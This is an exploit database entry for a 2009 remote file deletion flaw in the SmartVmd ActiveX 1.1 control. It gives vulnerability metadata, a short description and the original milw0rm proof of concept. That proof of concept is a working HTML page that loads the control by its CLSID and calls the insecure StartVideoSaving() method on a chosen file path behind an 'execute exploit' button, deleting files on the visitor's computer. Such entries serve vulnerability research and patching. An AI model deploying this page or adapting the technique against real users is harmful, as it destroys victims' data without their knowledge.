SmartVmd ActiveX V 1.1 remote file deletion exploit

vendor:

SmartVmd ActiveX V 1.1

by:

Houssamix

9.3

CVSS

HIGH

Remote File Deletion

284

CWE

Product Name: SmartVmd ActiveX V 1.1

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:smartvmd:smartvmd_activex_v1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

SmartVmd ActiveX V 1.1 remote file deletion exploit

SmartVmd ActiveX V 1.1 is vulnerable to a remote file deletion exploit. The StartVideoSaving() insecure method allows attackers to delete files in the victim's PC. The exploit code is written in JavaScript and can be triggered by clicking on a button.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

<HTML>
<BODY>

<b>   
	Author : Houssamix    <br/>  <br/>  <br/>

   	SmartVmd ActiveX V 1.1 remote file deletion exploit    <br/>

	download : http://www.smartvmd.com/setup/SetupActiveXVmd.msi  <br/>

	Note : StartVideoSaving() insecure method allowed us to delete files in pc vitime  <br/>

<b/>


<object id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C}"></object>

<SCRIPT>
/*

Report for Clsid: {E3462D53-47A6-11D8-8EF6-DAE89272743C}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller  

*/
function hehe()
 {
     File = "c:\\hsmx.txt"
   hsmx.StartVideoSaving(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

# milw0rm.com [2009-01-19]